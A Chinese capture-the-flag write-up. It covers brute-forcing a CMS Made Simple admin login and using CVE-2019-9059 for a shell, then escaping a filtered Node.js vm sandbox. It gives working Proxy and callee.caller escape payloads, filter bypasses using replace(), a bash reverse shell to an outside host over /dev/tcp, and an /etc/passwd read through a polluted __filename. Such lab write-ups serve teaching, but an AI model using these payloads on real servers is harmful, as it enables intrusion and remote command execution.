文章目录
-
- [my first cms](#my first cms)
- 全世界最简单的CTF
my first cms
打开题目在最下面发现是CMS Made Simple,版本为2.2.19
扫一下发现存在后台登陆界面,直接访问
用字典爆破下admin的密码为Admin123
然后直接登录,去漏洞库搜一下其实存在很多漏洞(重点看最近的)
找到CMS Made Simple的RCE漏洞(CVE-2019-9059)参考文章
步骤如下
登陆后按照上图,保存后去执行代码
成功反弹shell,得到flag
全世界最简单的CTF
扫目录发现存在/secret
源码泄露
const express = require('express');
const bodyParser = require('body-parser');
const app = express();
const fs = require("fs");
const path = require('path');
const vm = require("vm");
app
.use(bodyParser.json())
.set('views', path.join(__dirname, 'views'))
.use(express.static(path.join(__dirname, '/public')))
app.get('/', function (req, res){
res.sendFile(__dirname + '/public/home.html');
})
function waf(code) {
let pattern = /(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g;
if(code.match(pattern)){
throw new Error("what can I say? hacker out!!");
}
}
app.post('/', function (req, res){
let code = req.body.code;
let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
try {
waf(code)
let result = vm.runInContext(code, context);
console.log(result);
} catch (e){
console.log(e.message);
require('./hack');
}
})
app.get('/secret', function (req, res){
if(process.__filename == null) {
let content = fs.readFileSync(__filename, "utf-8");
return res.send(content);
} else {
let content = fs.readFileSync(process.__filename, "utf-8");
return res.send(content);
}
})
app.listen(3000, ()=>{
console.log("listen on 3000");
})
本题是考察如何沙箱逃逸实现RCE,waf过滤很多,process被办意味着我们需要用别的手段去得到process对象,中括号被办就不能利用js特性拼接绕过,\
被办意味着不能十六进制或者Unicode绕过。
解法一
我们注意到源码中的沙箱定义
let code = req.body.code;
let sandbox = Object.create(null);
let context = vm.createContext(sandbox);
create内为null,并且也没有其他可以引用的对象,这时候想要逃逸我们要用到一个函数中的内置对象的属性arguments.callee.caller,它可以返回函数的调用者。
而一般情况如果没有执行字符串操作或者利用函数重写,我们可以利用Proxy劫持
throw new Proxy({}, {
get: function(){
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return process'))();
return p.mainModule.require('child_process').execSync('whoami').toString();
}
})
而本题过滤了很多,我们可以用replace函数来绕过对process的检测
const p = (cc.constructor.constructor('return proAcess'.replace('A','')))();
const obj=p.mainModule.require('child_process'.replace('A',''));
接下来是最为精彩的一步,利用javascript内置函数去返回一个属性描述符(PropertyDescriptor)对象,其中包括value也就是属性值
最终payload如下
throw new Proxy({}, {
get: function(){
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return procAess'.replace('A','')))();
const obj = p.mainModule.require('child_procAess'.replace('A',''));
const ex = Object.getOwnPropertyDescriptor(obj,'exeAcSync'.replace('A',''));
return ex.value('bash -c "bash -i >& /dev/tcp/5i781963p2.yicp.fun/58265 0>&1"').toString();
}
})
成功反弹shell,执行/readflag
得到flag
解法二
我们注意下面代码
app.get('/secret', function (req, res){
if(process.__filename == null) {
let content = fs.readFileSync(__filename, "utf-8");
return res.send(content);
} else {
let content = fs.readFileSync(process.__filename, "utf-8");
return res.send(content);
}
})
如果process.__filename
为null则回显源码,我们可以利用原型链污染__filename
实现任意文件读取
本解法利用反射去得到process对象
throw new Proxy({}, {
get: function(){
const c = arguments.callee.caller
const p = (c.constructor.constructor("return Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('pro')))"))()
return p.__filename="/etc/passwd"
}
})
然后访问 /secret 即可成功读取
尝试读/flag,返回permission denied, open '/flag',没权限直接读
尝试读./hack
,注意路径是/app/hack.js
,提示shell.js
跟进一下
console.log("shell"); const p = require('child_process'); p.execSync(process.env.command);
最终payload
throw new Proxy({}, {
get: function(){
const c = arguments.callee.caller;
const p = (c.constructor.constructor("return Reflect.get(global, Reflect.ownKeys(global).find(x=>x.includes('pro')))"))();
p.env.command="whoami";
return p.mainModule.require("./shell");
}
})